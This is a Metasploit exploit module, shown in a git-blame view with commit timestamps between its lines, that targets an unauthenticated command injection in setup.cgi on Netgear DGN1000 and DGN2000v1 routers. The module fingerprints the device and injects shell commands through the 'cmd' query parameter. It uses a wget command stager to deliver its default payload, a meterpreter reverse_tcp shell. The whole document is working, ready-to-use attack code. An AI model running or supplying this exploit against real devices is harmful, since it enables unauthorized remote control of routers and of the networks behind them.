2017-10-20 22:17:04 -04:00
|
|
|
##
|
2017-10-21 18:38:32 -04:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
2017-10-20 22:17:04 -04:00
|
|
|
|
2017-10-20 20:25:11 -04:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
include Msf::Exploit::CmdStager
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits an unauthenticated OS command execution vulneralbility
|
|
|
|
|
in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
|
|
|
|
|
DGN2000v1 models.
|
|
|
|
|
},
|
|
|
|
|
'Author' => [
|
2017-11-10 18:15:22 -06:00
|
|
|
'Mumbai', # https://github.com/realoriginal (module)
|
2017-10-20 22:17:04 -04:00
|
|
|
'Robort Palerie <roberto@greyhats.it>' # vuln discovery
|
2017-10-20 20:25:11 -04:00
|
|
|
],
|
2017-10-22 22:17:40 -04:00
|
|
|
'References' => [
|
2017-10-22 16:11:19 -04:00
|
|
|
['EDB', '25978'],
|
2017-10-20 20:25:11 -04:00
|
|
|
],
|
2017-10-21 20:13:25 -04:00
|
|
|
'DisclosureDate' => 'Jun 5 2013',
|
2017-10-20 20:25:11 -04:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Platform' => 'linux',
|
|
|
|
|
'Arch' => ARCH_MIPSBE,
|
2017-10-22 22:17:40 -04:00
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
'DefaultOptions' => {
|
|
|
|
|
'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
|
|
|
|
|
},
|
2017-10-20 20:25:11 -04:00
|
|
|
'Privileged' => true,
|
|
|
|
|
'Payload' => {
|
|
|
|
|
'DisableNops' => true,
|
|
|
|
|
},
|
2017-10-22 22:17:40 -04:00
|
|
|
'Targets' => [[ 'Automatic', {} ]],
|
|
|
|
|
))
|
|
|
|
|
end
|
2017-10-20 20:25:11 -04:00
|
|
|
|
2017-10-22 22:17:40 -04:00
|
|
|
def check
|
|
|
|
|
begin
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'uri' => '/setup.cgi',
|
|
|
|
|
'method' => 'GET'
|
|
|
|
|
})
|
|
|
|
|
if res && res.headers['WWW-Authenticate']
|
|
|
|
|
auth = res.headers['WWW-Authenticate']
|
|
|
|
|
if auth =~ /DGN1000/
|
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
|
end
|
2017-10-20 20:25:11 -04:00
|
|
|
end
|
2017-10-22 22:17:40 -04:00
|
|
|
rescue ::Rex::ConnectionError
|
|
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
|
end
|
|
|
|
|
Exploit::CheckCode::Unknown
|
|
|
|
|
end
|
2017-10-20 20:25:11 -04:00
|
|
|
|
2017-10-22 22:17:40 -04:00
|
|
|
def exploit
|
|
|
|
|
print_status("#{peer} - Connecting to target...")
|
2017-10-20 20:25:11 -04:00
|
|
|
|
2017-10-22 22:17:40 -04:00
|
|
|
unless check == Exploit::CheckCode::Detected
|
|
|
|
|
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
|
|
|
|
|
end
|
2017-10-20 20:25:11 -04:00
|
|
|
|
2017-10-22 22:17:40 -04:00
|
|
|
print_status("#{peer} - Exploiting target ....")
|
|
|
|
|
execute_cmdstager(
|
|
|
|
|
:flavor => :wget,
|
|
|
|
|
:linemax => 200,
|
|
|
|
|
:concat_operator => " && "
|
|
|
|
|
)
|
|
|
|
|
end
|
2017-10-20 20:25:11 -04:00
|
|
|
|
2017-10-22 22:17:40 -04:00
|
|
|
def execute_command(cmd, opts)
|
|
|
|
|
begin
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'uri' => '/setup.cgi',
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'vars_get' => {
|
|
|
|
|
'next_file' => 'netgear.cfg',
|
|
|
|
|
'todo' => 'syscmd',
|
|
|
|
|
'cmd' => cmd.to_s,
|
|
|
|
|
'curpath' => '/',
|
|
|
|
|
'currentsetting.htm' => '1'
|
|
|
|
|
}
|
|
|
|
|
})
|
|
|
|
|
return res
|
|
|
|
|
rescue ::Rex::ConnectionError
|
|
|
|
|
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
2017-10-20 20:25:11 -04:00
|
|
|
end
|
2017-10-22 22:17:40 -04:00
|
|
|
end
|
|
|
|
|
end
|
